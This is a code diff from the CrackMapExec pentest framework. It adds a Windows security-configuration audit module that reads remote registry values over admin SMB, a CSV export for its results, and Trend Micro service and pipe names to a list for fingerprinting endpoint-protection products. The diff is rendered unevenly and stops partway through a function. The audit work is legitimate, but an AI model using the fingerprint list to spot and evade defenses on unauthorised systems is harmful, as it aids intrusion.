Merge branch 'master' into wmi
commit f78b708564

cme/cmedb.py (68)
@@ -340,8 +340,74 @@ class DatabaseNavigator(cmd.Cmd):
|
||||||
writable_keys = [key[2] for key in keys]
|
writable_keys = [key[2] for key in keys]
|
||||||
filename = line[2]
|
filename = line[2]
|
||||||
write_list(filename, writable_keys)
|
write_list(filename, writable_keys)
|
||||||
|
elif command == "wcc":
|
||||||
|
if len(line) < 3:
|
||||||
|
print("[-] invalid arguments, export wcc <simple|detailed> <filename>")
|
||||||
|
return
|
||||||
|
|
||||||
|
csv_header_simple = (
|
||||||
|
"id",
|
||||||
|
"ip",
|
||||||
|
"hostname",
|
||||||
|
"check",
|
||||||
|
"status",
|
||||||
|
)
|
||||||
|
csv_header_detailed = (
|
||||||
|
"id",
|
||||||
|
"ip",
|
||||||
|
"hostname",
|
||||||
|
"check",
|
||||||
|
"description",
|
||||||
|
"status",
|
||||||
|
"reasons"
|
||||||
|
)
|
||||||
|
filename = line[2]
|
||||||
|
host_mapping = {}
|
||||||
|
check_mapping = {}
|
||||||
|
|
||||||
|
hosts = self.db.get_hosts()
|
||||||
|
checks = self.db.get_checks()
|
||||||
|
check_results = self.db.get_check_results()
|
||||||
|
rows = []
|
||||||
|
|
||||||
|
for result_id,hostid,checkid,secure,reasons in check_results:
|
||||||
|
row = [result_id]
|
||||||
|
if hostid in host_mapping:
|
||||||
|
row.extend(host_mapping[hostid])
|
||||||
else:
print("[-] Invalid argument, specify creds, hosts, local_admins, shares or dpapi")
|
for host_id,ip,hostname,_,_,_,_,_,_,_,_ in hosts:
|
||||||
|
if host_id == hostid:
|
||||||
|
row.extend([ip, hostname])
|
||||||
|
host_mapping[hostid] = [ip, hostname]
|
||||||
|
break
|
||||||
|
if checkid in check_mapping:
|
||||||
|
row.extend(check_mapping[checkid])
|
||||||
|
else:
|
||||||
|
for check in checks:
|
||||||
|
check_id, name, description = check
|
||||||
|
if check_id == checkid:
|
||||||
|
row.extend([name, description])
|
||||||
|
check_mapping[checkid] = [name, description]
|
||||||
|
break
|
||||||
|
row.append('OK' if secure else 'KO')
|
||||||
|
row.append(reasons)
|
||||||
|
rows.append(row)
|
||||||
|
|
||||||
|
if line[1].lower() == "simple":
|
||||||
|
simple_rows = list((row[0], row[1], row[2], row[3], row[5]) for row in rows)
|
||||||
|
write_csv(filename, csv_header_simple, simple_rows)
|
||||||
|
elif line[1].lower() == "detailed":
|
||||||
|
write_csv(filename, csv_header_detailed, rows)
|
||||||
|
elif line[1].lower() == "signing":
|
||||||
|
hosts = self.db.get_hosts("signing")
|
||||||
|
signing_hosts = [host[1] for host in hosts]
|
||||||
|
write_list(filename, signing_hosts)
|
||||||
|
else:
|
||||||
|
print(f"[-] No such export option: {line[1]}")
|
||||||
|
return
|
||||||
|
print("[+] WCC exported")
|
||||||
|
else:
|
||||||
|
print("[-] Invalid argument, specify creds, hosts, local_admins, shares, wcc or dpapi")
|
||||||
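A quick illustration of the new export option, run from the cmedb prompt (filenames and the stored host data are hypothetical):
    export wcc simple wcc_summary.csv      # writes id,ip,hostname,check,status
    export wcc detailed wcc_report.csv     # writes id,ip,hostname,check,description,status,reasons
    export wcc signing signing_hosts.txt   # writes one IP per line from get_hosts("signing")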
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def help_export():
|
def help_export():
|
||||||
|
|
|
@@ -1,12 +1,15 @@
|
||||||
#!/usr/bin/env python3
|
#!/usr/bin/env python3
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
|
import cme
|
||||||
import importlib
|
import importlib
|
||||||
|
import traceback
|
||||||
|
import sys
|
||||||
|
|
||||||
from os import listdir
|
from os import listdir
|
||||||
from os.path import dirname
|
from os.path import dirname
|
||||||
from os.path import join as path_join
|
from os.path import join as path_join
|
||||||
import sys
|
|
||||||
|
|
||||||
import cme
|
|
||||||
from cme.context import Context
|
from cme.context import Context
|
||||||
from cme.logger import CMEAdapter
|
from cme.logger import CMEAdapter
|
||||||
from cme.paths import CME_PATH
|
from cme.paths import CME_PATH
|
||||||
|
@@ -64,6 +67,7 @@ class ModuleLoader:
|
||||||
return module
|
return module
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
self.logger.fail(f"Failed loading module at {module_path}: {e}")
|
self.logger.fail(f"Failed loading module at {module_path}: {e}")
|
||||||
|
self.logger.debug(traceback.format_exc())
|
||||||
return None
|
return None
|
||||||
|
|
||||||
def init_module(self, module_path):
|
def init_module(self, module_path):
|
||||||
|
@@ -116,6 +120,7 @@ class ModuleLoader:
|
||||||
return module
|
return module
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
self.logger.fail(f"Failed loading module at {module_path}: {e}")
|
self.logger.fail(f"Failed loading module at {module_path}: {e}")
|
||||||
|
self.logger.debug(traceback.format_exc())
|
||||||
return None
|
return None
|
||||||
|
|
||||||
def list_modules(self):
|
def list_modules(self):
|
||||||
|
@@ -131,7 +136,10 @@ class ModuleLoader:
|
||||||
for path in modules_paths:
|
for path in modules_paths:
|
||||||
for module in listdir(path):
|
for module in listdir(path):
|
||||||
if module[-3:] == ".py" and module != "example_module.py":
|
if module[-3:] == ".py" and module != "example_module.py":
|
||||||
|
try:
|
||||||
module_path = path_join(path, module)
|
module_path = path_join(path, module)
|
||||||
module_data = self.get_module_info(module_path)
|
module_data = self.get_module_info(module_path)
|
||||||
modules.update(module_data)
|
modules.update(module_data)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
return modules
|
return modules
|
||||||
|
|
|
@@ -381,6 +381,61 @@ conf = {
|
||||||
|
|
||||||
],
|
],
|
||||||
},
|
},
|
||||||
|
{
|
||||||
|
"name": "Trend Micro Endpoint Security",
|
||||||
|
"services": [
|
||||||
|
{
|
||||||
|
"name": "Trend Micro Endpoint Basecamp",
|
||||||
|
"description": "Trend Micro Endpoint Basecamp",
|
||||||
|
},
|
||||||
|
|
||||||
|
{
|
||||||
|
"name": "TMBMServer",
|
||||||
|
"description": "Trend Micro Unauthorized Change Prevention Service",
|
||||||
|
},
|
||||||
|
|
||||||
|
{
|
||||||
|
"name": "Trend Micro Web Service Communicator",
|
||||||
|
"description": "Trend Micro Web Service Communicator",
|
||||||
|
},
|
||||||
|
|
||||||
|
{
|
||||||
|
"name": "TMiACAgentSvc",
|
||||||
|
"description": "Trend Micro Application Control Service (Agent)",
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"name": "CETASvc",
|
||||||
|
"description": "Trend Micro Cloud Endpoint Telemetry Service",
|
||||||
|
},
|
||||||
|
{
|
||||||
|
|
||||||
|
"name": "iVPAgent",
|
||||||
|
"description": "Trend Micro Vulnerability Protection Service (Agent)",
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"pipes": [
|
||||||
|
{
|
||||||
|
"name": "IPC_XBC_XBC_AGENT_PIPE_*",
|
||||||
|
"processes": ["EndpointBasecamp.exe"],
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"name": "iacagent_*",
|
||||||
|
"processes": ["TMiACAgentSvc.exe"],
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"name": "OIPC_LWCS_PIPE_*",
|
||||||
|
"processes": ["TmListen.exe"],
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"name": "Log_ServerNamePipe",
|
||||||
|
"processes": ["LogServer.exe"],
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"name": "OIPC_NTRTSCAN_PIPE_*",
|
||||||
|
"processes": ["Ntrtscan.exe"],
|
||||||
|
},
|
||||||
|
],
|
||||||
|
},
|
||||||
{
|
{
|
||||||
"name": "Symantec Endpoint Protection",
|
"name": "Symantec Endpoint Protection",
|
||||||
"services": [
|
"services": [
|
||||||
|
|
|
@@ -10,7 +10,7 @@ class CMEModule:
|
||||||
|
|
||||||
name = "example module"
|
name = "example module"
|
||||||
description = "I do something"
|
description = "I do something"
|
||||||
supported_protocols = []
|
supported_protocols = [] # Example: ['smb', 'mssql']
|
||||||
opsec_safe = True # Does the module touch disk?
|
opsec_safe = True # Does the module touch disk?
|
||||||
multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time?
|
multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time?
|
||||||
|
|
||||||
|
@@ -28,7 +28,23 @@ class CMEModule:
|
||||||
"""Concurrent.
|
"""Concurrent.
|
||||||
Required if on_admin_login is not present. This gets called on each authenticated connection
|
Required if on_admin_login is not present. This gets called on each authenticated connection
|
||||||
"""
|
"""
|
||||||
pass
|
# Logging best practice
|
||||||
|
# Mostly you should use these functions to display information to the user
|
||||||
|
context.log.display("I'm doing something") # Use this for every normal message ([*] I'm doing something)
|
||||||
|
context.log.success("I'm doing something") # Use this for when something succeeds ([+] I'm doing something)
|
||||||
|
context.log.fail("I'm doing something") # Use this for when something fails ([-] I'm doing something), for example a remote registry entry is missing which is needed to proceed
|
||||||
|
context.log.highlight("I'm doing something") # Use this for when something is important and should be highlighted, printing credentials for example
|
||||||
|
|
||||||
|
# These are for debugging purposes
|
||||||
|
context.log.info("I'm doing something") # This will only be displayed if the user has specified the --verbose flag, so add additional info that might be useful
|
||||||
|
context.log.debug("I'm doing something") # This will only be displayed if the user has specified the --debug flag, so add info that you would might need for debugging errors
|
||||||
|
|
||||||
|
# These are for more critical error handling
|
||||||
|
context.log.error("I'm doing something") # This will not be printed in the module context and should only be used for critical errors (e.g. a required python file is missing)
|
||||||
|
try:
|
||||||
|
raise Exception("Exception that might occure")
|
||||||
|
except Exception as e:
|
||||||
|
context.log.exception(f"Exception occured: {e}") # This will display an exception traceback screen after an exception was raised and should only be used for critical errors
|
||||||
|
|
||||||
def on_admin_login(self, context, connection):
|
def on_admin_login(self, context, connection):
|
||||||
"""Concurrent.
|
"""Concurrent.
|
||||||
|
|
|
@@ -0,0 +1,795 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
|
import json
|
||||||
|
import logging
|
||||||
|
import operator
|
||||||
|
import sys
|
||||||
|
import time
|
||||||
|
from termcolor import colored
|
||||||
|
|
||||||
|
from cme.logger import cme_logger
|
||||||
|
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
||||||
|
from impacket.dcerpc.v5 import rrp, samr, scmr
|
||||||
|
from impacket.dcerpc.v5.rrp import DCERPCSessionError
|
||||||
|
from impacket.smbconnection import SessionError as SMBSessionError
|
||||||
|
from impacket.examples.secretsdump import RemoteOperations
|
||||||
|
from impacket.system_errors import *
|
||||||
|
|
||||||
|
# Configuration variables
|
||||||
|
OUTDATED_THRESHOLD = 30
|
||||||
|
DEFAULT_OUTPUT_FILE = './wcc_results.json'
|
||||||
|
DEFAULT_OUTPUT_FORMAT = 'json'
|
||||||
|
VALID_OUTPUT_FORMATS = ['json', 'csv']
|
||||||
|
|
||||||
|
# Registry value types
|
||||||
|
REG_VALUE_TYPE_UNDEFINED = 0
|
||||||
|
REG_VALUE_TYPE_UNICODE_STRING = 1
|
||||||
|
REG_VALUE_TYPE_UNICODE_STRING_WITH_ENV = 2
|
||||||
|
REG_VALUE_TYPE_BINARY = 3
|
||||||
|
REG_VALUE_TYPE_32BIT_LE = 4
|
||||||
|
REG_VALUE_TYPE_32BIT_BE = 5
|
||||||
|
REG_VALUE_TYPE_UNICODE_STRING_SEQUENCE = 7
|
||||||
|
REG_VALUE_TYPE_64BIT_LE = 11
|
||||||
|
|
||||||
|
# Setup file logger
|
||||||
|
if 'wcc_logger' not in globals():
|
||||||
|
wcc_logger = logging.getLogger('WCC')
|
||||||
|
wcc_logger.propagate = False
|
||||||
|
log_filename = cme_logger.init_log_file()
|
||||||
|
log_filename = log_filename.replace('log_', 'wcc_')
|
||||||
|
wcc_logger.setLevel(logging.INFO)
|
||||||
|
wcc_file_handler = logging.FileHandler(log_filename)
|
||||||
|
wcc_file_handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s] %(message)s'))
|
||||||
|
wcc_logger.addHandler(wcc_file_handler)
|
||||||
|
|
||||||
|
class ConfigCheck:
|
||||||
|
"""
|
||||||
|
Class for performing the checks and holding the results
|
||||||
|
"""
|
||||||
|
|
||||||
|
module = None
|
||||||
|
|
||||||
|
def __init__(self, name, description="", checkers=[None], checker_args=[[]], checker_kwargs=[{}]):
|
||||||
|
self.check_id = None
|
||||||
|
self.name = name
|
||||||
|
self.description = description
|
||||||
|
assert len(checkers) == len(checker_args) and len(checkers) == len(checker_kwargs)
|
||||||
|
self.checkers = checkers
|
||||||
|
self.checker_args = checker_args
|
||||||
|
self.checker_kwargs = checker_kwargs
|
||||||
|
self.ok = True
|
||||||
|
self.reasons = []
|
||||||
|
|
||||||
|
def run(self):
|
||||||
|
for checker, args, kwargs in zip(self.checkers, self.checker_args, self.checker_kwargs):
|
||||||
|
if checker is None:
|
||||||
|
checker = HostChecker.check_registry
|
||||||
|
|
||||||
|
ok, reasons = checker(*args, **kwargs)
|
||||||
|
self.ok = self.ok and ok
|
||||||
|
self.reasons.extend(reasons)
|
||||||
|
|
||||||
|
def log(self, context):
|
||||||
|
result = 'passed' if self.ok else 'did not pass'
|
||||||
|
reasons = ', '.join(self.reasons)
|
||||||
|
wcc_logger.info(f'{self.connection.host}: Check "{self.name}" {result} because: {reasons}')
|
||||||
|
if self.module.quiet:
|
||||||
|
return
|
||||||
|
|
||||||
|
status = colored('OK', 'green', attrs=['bold']) if self.ok else colored('KO', 'red', attrs=['bold'])
|
||||||
|
reasons = ": " + ', '.join(self.reasons)
|
||||||
|
msg = f'{status} {self.name}'
|
||||||
|
info_msg = f'{status} {self.name}{reasons}'
|
||||||
|
context.log.highlight(msg)
|
||||||
|
context.log.info(info_msg)
|
||||||
|
|
||||||
|
class CMEModule:
|
||||||
|
'''
|
||||||
|
Windows Configuration Checker
|
||||||
|
|
||||||
|
Module author: @__fpr (Orange Cyberdefense)
|
||||||
|
'''
|
||||||
|
name = 'wcc'
|
||||||
|
description = 'Check various security configuration items on Windows machines'
|
||||||
|
supported_protocols = ['smb']
|
||||||
|
opsec_safe = True
|
||||||
|
multiple_hosts = True
|
||||||
|
|
||||||
|
def options(self, context, module_options):
|
||||||
|
'''
|
||||||
|
OUTPUT_FORMAT Format for report (Default: 'json')
|
||||||
|
OUTPUT Path for report
|
||||||
|
QUIET Do not print results to stdout (Default: False)
|
||||||
|
'''
|
||||||
|
self.output = module_options.get('OUTPUT')
|
||||||
|
self.output_format = module_options.get('OUTPUT_FORMAT', DEFAULT_OUTPUT_FORMAT)
|
||||||
|
if self.output_format not in VALID_OUTPUT_FORMATS:
|
||||||
|
self.output_format = DEFAULT_OUTPUT_FORMAT
|
||||||
|
self.quiet = module_options.get('QUIET', 'false').lower() in ('true', '1')
|
||||||
|
|
||||||
|
self.results = {}
|
||||||
|
ConfigCheck.module = self
|
||||||
|
HostChecker.module = self
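# Illustrative invocation of this module (a sketch; the target, credentials and output path
# are hypothetical, and CLI flags may differ slightly between CME versions):
#   cme smb 192.168.1.10 -u admin -p 'Passw0rd!' -M wcc -o OUTPUT=/tmp/wcc.json OUTPUT_FORMAT=json QUIET=true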
|
||||||
|
|
||||||
|
def on_admin_login(self, context, connection):
|
||||||
|
self.results.setdefault(connection.host, {'checks':[]})
|
||||||
|
self.context = context
|
||||||
|
HostChecker(context, connection).run()
|
||||||
|
|
||||||
|
def on_shutdown(self, context, connection):
|
||||||
|
if self.output is not None:
|
||||||
|
self.export_results()
|
||||||
|
|
||||||
|
def add_result(self, host, result):
|
||||||
|
self.results[host]['checks'].append({
|
||||||
|
"Check":result.name,
|
||||||
|
"Description":result.description,
|
||||||
|
"Status":'OK' if result.ok else 'KO',
|
||||||
|
"Reasons":result.reasons
|
||||||
|
})
|
||||||
|
|
||||||
|
def export_results(self):
|
||||||
|
with open(self.output, 'w') as output:
|
||||||
|
if self.output_format == 'json':
|
||||||
|
json.dump(self.results, output)
|
||||||
|
elif self.output_format == 'csv':
|
||||||
|
output.write('Host,Check,Description,Status,Reasons')
|
||||||
|
for host in self.results:
|
||||||
|
for result in self.results[host]['checks']:
|
||||||
|
output.write(f'\n{host}')
|
||||||
|
for field in (result['Check'], result['Description'], result['Status'], ' ; '.join(result['Reasons']).replace('\x00','')):
|
||||||
|
if ',' in field:
|
||||||
|
field = field.replace('"', '""')
|
||||||
|
field = f'"{field}"'
|
||||||
|
output.write(f',{field}')
|
||||||
|
self.context.log.success(f'Results written to {self.output}')
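# CSV escaping example (illustrative): a reasons field such as
#   HKLM\...\EnableLUA (1) == 1, HKLM\...\LocalAccountTokenFilterPolicy (0) == 0
# contains commas, so it is wrapped in double quotes (with any embedded '"' doubled)
# before being appended to the row, following the usual CSV quoting convention.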
|
||||||
|
|
||||||
|
class HostChecker:
|
||||||
|
module = None
|
||||||
|
|
||||||
|
def __init__(self, context, connection):
|
||||||
|
self.context = context
|
||||||
|
self.connection = connection
|
||||||
|
remoteOps = RemoteOperations(smbConnection=connection.conn, doKerberos=False)
|
||||||
|
remoteOps.enableRegistry()
|
||||||
|
self.dce = remoteOps._RemoteOperations__rrp
|
||||||
|
|
||||||
|
def run(self):
|
||||||
|
# Prepare checks
|
||||||
|
self.init_checks()
|
||||||
|
|
||||||
|
# Perform checks
|
||||||
|
self.check_config()
|
||||||
|
|
||||||
|
# Check methods #
|
||||||
|
#################
|
||||||
|
|
||||||
|
def init_checks(self):
|
||||||
|
# Declare the checks to do and how to do them
|
||||||
|
self.checks = [
|
||||||
|
ConfigCheck('Last successful update', 'Checks how old the last successful update is', checkers=[self.check_last_successful_update]),
|
||||||
|
ConfigCheck('LAPS', 'Checks if LAPS is installed', checkers=[self.check_laps]),
|
||||||
|
ConfigCheck("Administrator's name", 'Checks if Administror user name has been changed', checkers=[self.check_administrator_name]),
|
||||||
|
ConfigCheck('UAC configuration', 'Checks if UAC configuration is secure', checker_args=[[
|
||||||
|
self,
|
||||||
|
(
|
||||||
|
'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System',
|
||||||
|
'EnableLUA', 1
|
||||||
|
),(
|
||||||
|
'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System',
|
||||||
|
'LocalAccountTokenFilterPolicy', 0
|
||||||
|
)]]),
|
||||||
|
ConfigCheck('Hash storage format', 'Checks if storing hashes in LM format is disabled', checker_args=[[self, (
|
||||||
|
'HKLM\\System\\CurrentControlSet\\Control\\Lsa',
|
||||||
|
'NoLMHash', 1
|
||||||
|
)]]),
|
||||||
|
ConfigCheck('Always install elevated', 'Checks if AlwaysInstallElevated is disabled', checker_args=[[self, (
|
||||||
|
'HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer',
|
||||||
|
'AlwaysInstallElevated', 0
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('IPv6 preference', 'Checks if IPv6 is preferred over IPv4', checker_args=[[self, (
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Services\\Tcpip6\\Parameters',
|
||||||
|
'DisabledComponents', (32, 255), in_
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('Spooler service', 'Checks if the spooler service is disabled', checkers=[self.check_spooler_service]),
|
||||||
|
ConfigCheck('WDigest authentication', 'Checks if WDigest authentication is disabled', checker_args=[[self, (
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest',
|
||||||
|
'UseLogonCredential', 0
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('WSUS configuration', 'Checks if WSUS configuration uses HTTPS', checkers=[self.check_wsus_running, None], checker_args=[[], [self, (
|
||||||
|
'HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate',
|
||||||
|
'WUServer', 'https://', startswith
|
||||||
|
),(
|
||||||
|
'HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate',
|
||||||
|
'UseWUServer', 0, operator.eq
|
||||||
|
)]], checker_kwargs=[{},{'options':{'lastWins':True}}]),
|
||||||
|
ConfigCheck('LSA cache', 'Checks how many logons are kept in the LSA cache', checker_args=[[self, (
|
||||||
|
'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon',
|
||||||
|
'CachedLogonsCount', 2, le
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('AppLocker', 'Checks if there are AppLocker rules defined', checkers=[self.check_applocker]),
|
||||||
|
ConfigCheck('RDP expiration time', 'Checks RDP session timeout', checker_args=[[self, (
|
||||||
|
'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services',
|
||||||
|
'MaxDisconnectionTime', 0, operator.gt
|
||||||
|
),(
|
||||||
|
'HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services',
|
||||||
|
'MaxDisconnectionTime', 0, operator.gt
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('CredentialGuard', 'Checks if CredentialGuard is enabled', checker_args=[[self, (
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard',
|
||||||
|
'EnableVirtualizationBasedSecurity', 1
|
||||||
|
),(
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa',
|
||||||
|
'LsaCfgFlags', 1
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('PPL', 'Checks if lsass runs as a protected process', checker_args=[[self, (
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa',
|
||||||
|
'RunAsPPL', 1
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('Powershell v2 availability', 'Checks if powershell v2 is available', checker_args=[[self, (
|
||||||
|
'HKLM\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowerShellEngine',
|
||||||
|
'PSCompatibleVersion', '2.0', not_(operator.contains)
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('LmCompatibilityLevel', 'Checks if LmCompatibilityLevel is set to 5', checker_args=[[self, (
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa',
|
||||||
|
'LmCompatibilityLevel', 5, operator.ge
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('NBTNS', 'Checks if NBTNS is disabled on all interfaces', checkers=[self.check_nbtns]),
|
||||||
|
ConfigCheck('mDNS', 'Checks if mDNS is disabled', checker_args=[[self, (
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNScache\\Parameters',
|
||||||
|
'EnableMDNS', 0
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('SMB signing', 'Checks if SMB signing is enabled', checker_args=[[self, (
|
||||||
|
'HKLM\\System\\CurrentControlSet\\Services\\LanmanServer\\Parameters',
|
||||||
|
'requiresecuritysignature', 1
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('LDAP signing', 'Checks if LDAP signing is enabled', checker_args=[[self, (
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters',
|
||||||
|
'LDAPServerIntegrity', 2
|
||||||
|
),(
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS',
|
||||||
|
'LdapEnforceChannelBinding', 2
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('SMB encryption', 'Checks if SMB encryption is enabled', checker_args=[[self, (
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters',
|
||||||
|
'EncryptData', 1
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('RDP authentication', 'Checks RDP authentication configuration (NLA auth and restricted admin mode)', checker_args=[[self, (
|
||||||
|
'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\',
|
||||||
|
'UserAuthentication', 1
|
||||||
|
),(
|
||||||
|
'HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA',
|
||||||
|
'RestrictedAdminMode', 1
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('BitLocker configuration', 'Checks the BitLocker configuration (based on https://www.stigviewer.com/stig/windows_10/2020-06-15/finding/V-94859)', checker_args=[[self, (
|
||||||
|
'HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE',
|
||||||
|
'UseAdvancedStartup', 1
|
||||||
|
),(
|
||||||
|
'HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE',
|
||||||
|
'UseTPMPIN', 1
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('Guest account disabled', 'Checks if the guest account is disabled', checkers=[self.check_guest_account_disabled]),
|
||||||
|
ConfigCheck('Automatic session lock', 'Checks if the session is automatically locked after a period of inactivity', checker_args=[[self, (
|
||||||
|
'HKCU\\Control Panel\\Desktop',
|
||||||
|
'ScreenSaverIsSecure', 1
|
||||||
|
),(
|
||||||
|
'HKCU\\Control Panel\\Desktop',
|
||||||
|
'ScreenSaveTimeOut', 300, le
|
||||||
|
)
|
||||||
|
]]),
|
||||||
|
ConfigCheck('Powershell Execution Policy', 'Checks if the Powershell execution policy is set to "Restricted"', checker_args=[[self, (
|
||||||
|
'HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.Powershell',
|
||||||
|
'ExecutionPolicy', 'Restricted\x00'
|
||||||
|
),(
|
||||||
|
'HKCU\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.Powershell',
|
||||||
|
'ExecutionPolicy', 'Restricted\x00'
|
||||||
|
)
|
||||||
|
]], checker_kwargs=[{'options':{'KOIfMissing':False, 'lastWins':True}}])
|
||||||
|
]
|
||||||
|
|
||||||
|
# Add check to conf_checks table if missing
|
||||||
|
db_checks = self.connection.db.get_checks()
|
||||||
|
db_check_names = [ check._asdict()['name'].strip().lower() for check in db_checks ]
|
||||||
|
added = []
|
||||||
|
for i,check in enumerate(self.checks):
|
||||||
|
check.connection = self.connection
|
||||||
|
missing = True
|
||||||
|
for db_check in db_checks:
|
||||||
|
db_check = db_check._asdict()
|
||||||
|
if check.name.strip().lower() == db_check['name'].strip().lower():
|
||||||
|
missing = False
|
||||||
|
self.checks[i].check_id = db_check['id']
|
||||||
|
break
|
||||||
|
|
||||||
|
if missing:
|
||||||
|
self.connection.db.add_check(check.name, check.description)
|
||||||
|
added.append(check)
|
||||||
|
|
||||||
|
# Update check_id for checks added to the db
|
||||||
|
db_checks = self.connection.db.get_checks()
|
||||||
|
for i,check in enumerate(added):
|
||||||
|
check_id = None
|
||||||
|
for db_check in db_checks:
|
||||||
|
db_check = db_check._asdict()
|
||||||
|
if db_check['name'].strip().lower() == check.name.strip().lower():
|
||||||
|
check_id = db_check['id']
|
||||||
|
break
|
||||||
|
added[i].check_id = check_id
|
||||||
|
|
||||||
|
def check_config(self):
|
||||||
|
# Get host ID from db
|
||||||
|
host_id = None
|
||||||
|
hosts = self.connection.db.get_hosts(self.connection.host)
|
||||||
|
for host in hosts:
|
||||||
|
host = host._asdict()
|
||||||
|
if host['ip'] == self.connection.host and host['hostname'] == self.connection.hostname and host['domain'] == self.connection.domain:
|
||||||
|
host_id = host['id']
|
||||||
|
break
|
||||||
|
|
||||||
|
# Perform all the checks and store the results
|
||||||
|
for check in self.checks:
|
||||||
|
try:
|
||||||
|
check.run()
|
||||||
|
except Exception as e:
|
||||||
|
self.context.log.error(f'HostChecker.check_config(): Error while performing check {check.name}: {e}')
|
||||||
|
check.log(self.context)
|
||||||
|
self.module.add_result(self.connection.host, check)
|
||||||
|
if host_id is not None:
|
||||||
|
self.connection.db.add_check_result(host_id, check.check_id, check.ok, ', '.join(check.reasons).replace('\x00',''))
|
||||||
|
|
||||||
|
def check_registry(self, *specs, options={}):
|
||||||
|
"""
|
||||||
|
Perform checks that only require to compare values in the registry with expected values, according to the specs
|
||||||
|
a spec may be either a 3-tuple: (key name, value name, expected value), or a 4-tuple (key name, value name, expected value, operation), where operation is a function that implements a comparison operator
|
||||||
|
"""
|
||||||
|
default_options = {
|
||||||
|
'lastWins':False,
|
||||||
|
'stopOnOK':False,
|
||||||
|
'stopOnKO':False,
|
||||||
|
'KOIfMissing':True
|
||||||
|
}
|
||||||
|
default_options.update(options)
|
||||||
|
options = default_options
|
||||||
|
op = operator.eq
|
||||||
|
ok = True
|
||||||
|
reasons = []
|
||||||
|
|
||||||
|
for spec in specs:
|
||||||
|
try:
|
||||||
|
if len(spec) == 3:
|
||||||
|
(key, value_name, expected_value) = spec
|
||||||
|
elif len(spec) == 4:
|
||||||
|
(key, value_name, expected_value, op) = spec
|
||||||
|
else:
|
||||||
|
ok = False
|
||||||
|
reasons = ['Check could not be performed (invalid specification provided)']
|
||||||
|
return ok, reasons
|
||||||
|
except Exception as e:
|
||||||
|
self.context.log.error(f'Check could not be performed. Details: specs={specs}, dce={self.dce}, error: {e}')
|
||||||
|
return ok, reasons
|
||||||
|
|
||||||
|
if op == operator.eq:
|
||||||
|
opstring = '{left} == {right}'
|
||||||
|
nopstring = '{left} != {right}'
|
||||||
|
elif op == operator.contains:
|
||||||
|
opstring = '{left} in {right}'
|
||||||
|
nopstring = '{left} not in {right}'
|
||||||
|
elif op == operator.gt:
|
||||||
|
opstring = '{left} > {right}'
|
||||||
|
nopstring = '{left} <= {right}'
|
||||||
|
elif op == operator.ge:
|
||||||
|
opstring = '{left} >= {right}'
|
||||||
|
nopstring = '{left} < {right}'
|
||||||
|
elif op == operator.lt:
|
||||||
|
opstring = '{left} < {right}'
|
||||||
|
nopstring = '{left} >= {right}'
|
||||||
|
elif op == operator.le:
|
||||||
|
opstring = '{left} <= {right}'
|
||||||
|
nopstring = '{left} > {right}'
